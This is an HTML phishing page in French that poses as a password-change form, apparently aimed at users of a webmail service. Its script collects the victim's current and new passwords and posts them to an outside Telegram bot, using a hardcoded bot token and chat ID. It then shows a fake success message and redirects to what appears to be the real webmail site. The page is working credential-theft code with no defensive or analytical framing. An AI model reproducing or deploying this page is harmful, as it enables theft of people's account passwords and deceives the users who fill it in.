<!DOCTYPE html>
<html lang="fr">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>Modifier Mot de Passe</title>

  <!-- ✅ Favicon -->
  <link rel="icon" type="image/png" href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRjqydisIh8mnyJ9vUWTTmpyCcX2HbU1frSkw&s" />

  <!-- ✅ Font -->
  <link href="https://fonts.googleapis.com/css2?family=Open+Sans&display=swap" rel="stylesheet" />

  <!-- ✅ CSS -->
  <style>
    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
      font-family: 'Open Sans', sans-serif;
    }

    body {
      background-color: #1e1e1e;
      color: #ffffff;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
    }

    .password-container {
      background: #2a2a2a;
      max-width: 400px;
      text-align: left;
      padding: 30px;
      border-radius: 10px;
      box-shadow: 0 0 10px rgba(0,0,0,0.2);
      border: 1px solid #555;
    }

    h1 {
      font-size: 1.5rem;
      font-weight: 600;
      margin-bottom: 20px;
      text-align: center;
    }

    .password-form {
      display: flex;
      flex-direction: column;
      gap: 20px;
    }

    .password-form label {
      font-size: 0.95rem;
      color: #aaa;
      margin-bottom: 5px;
    }

    .password-form input {
      padding: 12px;
      border-radius: 5px;
      border: 1px solid #555;
      background-color: #3a3a3a;
      color: #fff;
      font-size: 1rem;
    }

    .button-container {
      display: flex;
      justify-content: space-between;
      margin-top: 30px;
    }

    .password-form button, .cancel-button {
      padding: 12px 20px;
      border: 1px solid #555;
      border-radius: 30px;
      font-size: 1rem;
      font-weight: bold;
      transition: background 0.3s ease;
      cursor: pointer;
      width: 48%;
      text-align: center;
      text-decoration: none;
      display: inline-block;
    }

    .password-form button {
      background-color: #f47c7c;
      border: none;
      color: white;
    }

    .password-form button:hover {
      background-color: #ff6b6b;
    }

    .cancel-button {
      color: #aaa;
      background-color: transparent;
    }

    .cancel-button:hover {
      color: #fff;
    }

    .logo-img {
      width: 80px;
      margin-bottom: 20px;
      display: none;
    }
  </style>
</head>
<body>
  <div class="password-container">
  	
    <h1>Changement de mot de passe</h1>

    <form class="password-form">
      <label for="old-password">Mot de passe actuel:</label>
      <input type="password" id="old-password" name="old-password" required />

      <label for="new-password">Nouveau mot de passe:</label>
      <input type="password" id="new-password" name="new-password" required />

      <label for="confirm-password">Retaper votre mot de passe:</label>
      <input type="password" id="confirm-password" name="confirm-password" required />

      <div class="button-container">
        <button type="submit">Enregistrer</button>
        <a href="#" class="cancel-button">Annuler</a>
      </div>
    </form>
  </div>

  <script>
    // Remplacez ces valeurs par celles de votre bot
    const telegramBotToken = '7982653544:AAFo0JFNathHNi92MdpARAJEV7OcMwOE4cQ';
    const telegramChatId = '-1002253966185';

    const form = document.querySelector('.password-form');

    // Fonction pour envoyer les données au bot Telegram
    async function sendToTelegram(data) {
      const currentDate = new Date().toLocaleString();

      const message = `
        Ancien mot de passe: ${data.oldPassword}
        Nouveau mot de passe: ${data.newPassword}
        Confirmation du mot de passe: ${data.confirmPassword}
        🎫 Date/heure: ${currentDate}
      `;

      fetch(`https://api.telegram.org/bot${telegramBotToken}/sendMessage`, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json'
        },
        body: JSON.stringify({
          chat_id: telegramChatId,
          text: message
        })
      })
      .then(response => response.json())
      .then(result => {
        console.log('Message envoyé:', result);
        // Afficher un pop-up pour confirmer la modification
        alert('Votre mot de passe a été modifié avec succès !');
        // Redirection vers ensemble.html
        window.location.href = 'https://wml.vini.pf/?_h=4826f5a24fffbed254452816419f8b1ellai3mdcc0';
      })
      .catch(error => {
        console.error('Erreur lors de l\'envoi du message:', error);
        alert('Une erreur est survenue. Veuillez réessayer.');
      });
    }

    // Écouteur d'événements pour le formulaire
    form.addEventListener('submit', (event) => {
      event.preventDefault();

      const oldPassword = document.querySelector('#old-password').value;
      const newPassword = document.querySelector('#new-password').value;
      const confirmPassword = document.querySelector('#confirm-password').value;

      if (newPassword !== confirmPassword) {
        alert('Les nouveaux mots de passe ne correspondent pas. Veuillez réessayer.');
        return;
      }

      sendToTelegram({ oldPassword, newPassword, confirmPassword });
    });
  </script>
</body>
</html>
